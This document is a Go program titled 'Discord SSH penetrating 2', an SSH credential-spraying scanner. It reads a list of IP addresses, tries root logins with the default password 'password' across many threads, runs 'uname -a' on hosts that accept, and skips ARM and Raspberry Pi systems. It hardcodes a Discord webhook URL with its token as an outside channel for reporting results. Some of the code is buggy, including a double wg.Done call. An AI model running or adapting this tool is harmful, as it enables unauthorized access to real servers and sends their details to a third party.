Discord SSH penetrating 2

1. package main
2.  
3. import (
4. "bufio"
5. "bytes"
6. "encoding/json"
7. "fmt"
8. "io/ioutil"
9. "log"
10. "net"
11. "net/http"
12. "os"
13. "os/exec"
14. "runtime"
15. "strconv"
16. "strings"
17. "sync"
18. "time"
19.  
20. "golang.org/x/crypto/ssh"
21. )
22.  
23. const (
24. hardcorewebhook = "https://discord.com/api/webhooks/1199622995040280576/Il4yqAF8NVkXa2SRFShERIqxFFXVB4DNfmNOFLEP9WAVF1khOxH8xZLSCfI4VI8OHzKG"
25. )
26.  
27. func checkThreads(routines int, thread int64) bool {
28. return int64(routines) <= thread
29. }
30.  
31. var (
32. ipfile string
33. threads string
34. port string
35. )
36.  
37. func fileExists(filename string) bool {
38. info, err := os.Stat(filename)
39. return !os.IsNotExist(err) && !info.IsDir()
40. }
41.  
42. func init() {
43. if len(os.Args) <= 3 {
44. fmt.Println("Usage: [brute] [port] [threads] [iplist]")
45. os.Exit(1)
46. } else {
47. ipfile = os.Args[3]
48. threads = os.Args[2]
49. port = os.Args[1]
50. }
51. }
52.  
53. func waitTimeout(wg *sync.WaitGroup, timeout time.Duration) bool {
54. c := make(chan struct{})
55. go func() {
56. defer close(c)
57. wg.Wait()
58. }()
59. select {
60. case <-c:
61. return false
62. case <-time.After(timeout):
63. return true
64. }
65. }
66.  
67. func isExcludedSystem(unameOutput string) bool {
68. excludedSystems := []string{"aarch", "amzn", "amzn2", "armv7l", "raspberry", "raspberrypi"}
69. for _, excluded := range excludedSystems {
70. if strings.Contains(unameOutput, excluded) {
71. return true
72. }
73. }
74. return false
75. }
76.  
77. type DiscordMessage struct {
78. Embeds []Embed `json:"embeds"`
79. }
80.  
81. type Embed struct {
82. Title string `json:"title,omitempty"`
83. Description string `json:"description,omitempty"`
84. Color int `json:"color,omitempty"`
85. Author Author `json:"author,omitempty"`
86. Footer Footer `json:"footer,omitempty"`
87. }
88.  
89. type Author struct {
90. Name string `json:"name,omitempty"`
91. }
92.  
93. type Footer struct {
94. Text string `json:"text,omitempty"`
95. }
96.  
97. func toDiscord(message DiscordMessage, webhookURL string) {
98. payload, err := json.Marshal(message)
99. if err != nil {
100. return
101. }
102. resp, err := http.Post(webhookURL, "application/json", bytes.NewBuffer(payload))
103. if err != nil {
104. return
105. }
106. defer resp.Body.Close()
107. }
108.  
109. func readLines(path string) ([]string, error) {
110. file, err := os.Open(path)
111. if err != nil {
112. return nil, err
113. }
114. defer file.Close()
115.  
116. var lines []string
117. scanner := bufio.NewScanner(file)
118. for scanner.Scan() {
119. lines = append(lines, scanner.Text())
120. }
121. return lines, scanner.Err()
122. }
123.  
124. func remoteRun(user string, addr string, pass string, cmd string, wg *sync.WaitGroup) (string, error) {
125. defer wg.Done()
126.  
127. config := &ssh.ClientConfig{
128. User: user,
129. HostKeyCallback: ssh.InsecureIgnoreHostKey(),
130. Auth: []ssh.AuthMethod{
131. ssh.Password(pass),
132. },
133. Timeout: 40 * time.Second,
134. }
135.  
136. client, err := ssh.Dial("tcp", net.JoinHostPort(addr, port), config)
137. if err != nil {
138. return "", err
139. }
140. defer client.Close()
141.  
142. session, err := client.NewSession()
143. if err != nil {
144. return "", err
145. }
146. defer session.Close()
147.  
148. var b bytes.Buffer
149. session.Stdout = &b
150.  
151. err = session.Run(cmd)
152. if err != nil {
153. return "", err
154. }
155.  
156. if isExcludedSystem(b.String()) {
157. log.Printf("IP %s excluded due to system: %s", addr, b.String())
158. return "", nil
159. }
160.  
161. return b.String(), nil
162. }
163.  
164. func main() {
165. lines, err := readLines(ipfile)
166. if err != nil {
167. log.Fatalf("readLines: %s", err)
168. }
169.  
170. var wg sync.WaitGroup
171. uniqueIPs := make(map[string]bool)
172.  
173. for _, line := range lines {
174. ip := strings.TrimSpace(line)
175. if ip != "" {
176. uniqueIPs[ip] = true
177. }
178. }
179.  
180. var ips []string
181. for ip := range uniqueIPs {
182. ips = append(ips, ip)
183. }
184.  
185. thread, _ := strconv.ParseInt(threads, 10, 64)
186. routines := runtime.NumGoroutine()
187.  
188. for _, ip := range ips {
189. wg.Add(1)
190. go func(ip string) {
191. defer wg.Done()
192. if checkThreads(routines, thread) {
193. output, err := remoteRun("root", ip, "password", "uname -a", &wg)
194. if err == nil {
195. fmt.Printf("Success: %s\n", output)
196. } else {
197. fmt.Printf("Error: %s\n", err)
198. }
199. }
200. }(ip)
201. }
202.  
203. timeout := 90 * time.Second
204. if waitTimeout(&wg, timeout) {
205. fmt.Println("Execution timed out")
206. } else {
207. fmt.Println("Execution completed")
208. }
209. }